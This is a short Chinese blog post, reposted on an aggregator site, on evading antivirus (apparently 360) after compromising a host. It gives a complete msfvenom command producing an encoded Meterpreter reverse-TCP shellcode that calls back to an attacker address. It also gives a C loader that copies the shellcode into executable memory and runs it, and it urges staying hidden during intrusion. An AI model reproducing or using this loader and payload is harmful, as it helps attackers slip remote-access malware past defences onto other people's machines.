免杀

发布时间:2022-06-28 发布网站:脚本宝典
脚本宝典收集整理的这篇文章主要介绍了免杀脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。

免杀

免杀

 

在拿到一枚shell后,我们必须要做好权限维持,如果目标主机上有AV的话,我们一定要做好免杀处理,不能被发现!宁可不攻击也不要被发现,所以免杀是在内网渗透过程中最关键的一步!今天分享一个绕过某60的免杀技巧,总结就是:只要会代码,免杀随便绕!

 

 

Metasploit 生成 C 过免杀 360

Metasploit

 

Msf 相比大家都看过我直接写的笔记,大家也都会使用,这里也不一一细讲,直接上操作:

首先使用MSF的shikata_ga_nai构建x86一个shellcode:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.12 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c

 

免杀

然后使用 VC 编译(我用的是 VC 2019):

#include <stdio.h>#include <windows.h>unsigned const char payload[] = "这里是生成的shellcode";size_t size = 0;int main(int argc, char** argv) {    char* code;    printf("Hello Hack saul!n");    code = (char*)VirtualAlloc(NULL, size, MEM_COMMIT,PAGE_EXECUTE_READWRITE);    memcpy(code, payload, size);     ((void(*)())code)();    return(0);}

 

免杀

字节可以改改,然后运行上线:

免杀

免杀

脚本宝典总结

以上是脚本宝典为你收集整理的免杀全部内容,希望文章能够帮你解决免杀所遇到的问题。

如果觉得脚本宝典网站内容还不错,欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
标签: